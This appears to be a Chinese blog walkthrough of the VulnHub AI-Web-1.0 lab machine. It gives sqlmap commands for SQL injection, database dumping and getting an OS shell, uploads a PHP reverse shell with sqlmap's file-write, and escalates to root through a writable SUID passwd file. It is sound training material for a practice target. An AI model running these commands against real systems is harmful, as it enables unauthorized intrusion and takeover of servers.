vlunhub——AI-WEB-1.0 靶机渗透测试

最新推荐文章于 2024-06-29 21:30:35 发布
最新推荐文章于 2024-06-29 21:30:35 发布
阅读量242 收藏 2
点赞数 4
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/czx1234566/article/details/134869797
版权

下载链接:

官网下载地址:

​​​​​​https://www.vulnhub.com/entry/ai-web-1,353/

网盘下载地址:

链接:https://pan.baidu.com/s/1fIUVs3zLBCr1URm8ygC2fw?pwd=gsxq 
提取码:gsxq 

渗透测试

1.信息收集

1.1获取靶机ip

1.2端口扫描

给了个80端口而且是http服务

访问一下

1.3后台扫描

发现有一个robots.txt

看看里面有什么东西

依次访问

都没权限访问猜测是目录

继续扫描

m3diNf0这个下面有一个info.php

访问一下

看看另外一个目录

扫描一下这个/se3reTdir777/uploads目录

没有东西

这个目录没有东西我们扫描一下他的上一个目录/se3reTdir777

发现有两个文件,先访问index.php

输入一个1

发现爆出了一些东西

这里猜测是sql注入

burp抓一下包看看参数,sqlmap尝试跑一下

给这些请求信息塞文件里面去跑

2漏洞利用

sqlmap -r sql.txt --dbs --batch

sqlmap -r sql.txt -D aiweb1 --tables --batch

 

sqlmap -r sql.txt -D aiweb1 -T user --columns --batch

 跑到这里就不用跑了,这些东西利用不了。

尝试拿一下shell

sqlmap -r sql.txt --os-shell

这里要绝对路径

之前有一个info.php的文件里面有路径

用以下这个路径:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

拿到shell

尝试反弹。

这里就要用到kali里面自带的反弹shell文件了

路径:/usr/share/webshells/php下面的php-reverse-shell.php文件

给里面内容进行更改以下,就能用了。(按自己情况来)

把文件传到刚刚的路径去

sqlmap -r sql.txt --file-write test.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/test.php

 

本地监听刚刚设置的端口,在运行以下刚刚的传上去的文件

php test.php

3.本地提权

看一下哪些命令有root权限

find / -perm -u=s -type f 2>/dev/null

发现有passwd,尝试写入试试。

perl -le 'print crypt("123456","aa")'

 写入成功,拿到root权限

xise
关注
vlunhub- BoredHackerBlog Social Network
GALi_233的博客
08-21 829
Description Leave a message is a new anonymous social networking site where users can post messages for each other. They’ve assigned you to test their set up. They do utilize docker containers. You can conduct attacks against those too. Try to see if you
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4298
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 419
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
【Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 3746
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub靶机实战-Me-and-My-Girlfriend
黑白的博客
01-10 571
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.6 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.239.6 Who are you? Hacker? Sorry This Site Can Only Be Accessed loc
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6727
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2426
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
AI-Web-1.0靶场
qq_46187131的博客
03-27 1431
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
记录一次vulnhubAI-WEB-1.0靶场复现
sszsNo1的博客
06-24 278
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3132
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
vulnhub靶机HA wordy渗透测试
Long_gone的博客
10-04 673
打开靶机后,先扫描一下靶机IP是多少: netdiscover 由经验推断出靶机IP为:192.168.34.224,然后使用使用nmap扫描一下靶机端口开放情况: nmap -sV -p 0-65535 192.168.34.224 发现有http端口开放,然后访问一下看看: 在页面并没有什么发现,然后我们先使用目录爆破一下看看: dirb http://192.168.34.224:...
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6169
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
vulunhub靶机--DC-2测试思路
最新发布
hxh108的博客
06-29 554
bin/sh即可提取到root权限,之后进入root文件中,就可看到最终的flag文件。根据flag1的提示,使用cewl生成有关靶机的弱口令字典,之后使用wpscan扫描靶机wordpress的用户名。命令:wpscan --url http://dc-2/ -U 4.txt -P 192.168.206.135dict.txt。成功后,回退一个目录,进入Jerry中即可发现flag4.txt,或者直接su切换到Jerry查看。命令:wpscan --url http://dc-2/ -e u。
Vulunhub Web2靶机练习之lxc
Aiwin的博客
10-04 980
Vulunhub Web2靶机练习
vulnhub之Five86-1
底层社会中的弱智
02-04 791
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
vulnhub靶机rava2渗透测试
Long_gone的博客
09-28 483
首先利用netdiscover这个工具来进行对靶机的IP扫描: netdiscover 然后可以判断出靶机IP为192.168.34.225,接着就用nmap扫描一下靶机的端口开放情况: nmap -A 192.168.34.225 发现靶机开放了22,80,111这3个端口,然后就先访问一下80端口: 接着就是用dirb工具扫描目录,进行目录的爆破: dirb http://192....
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3716
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值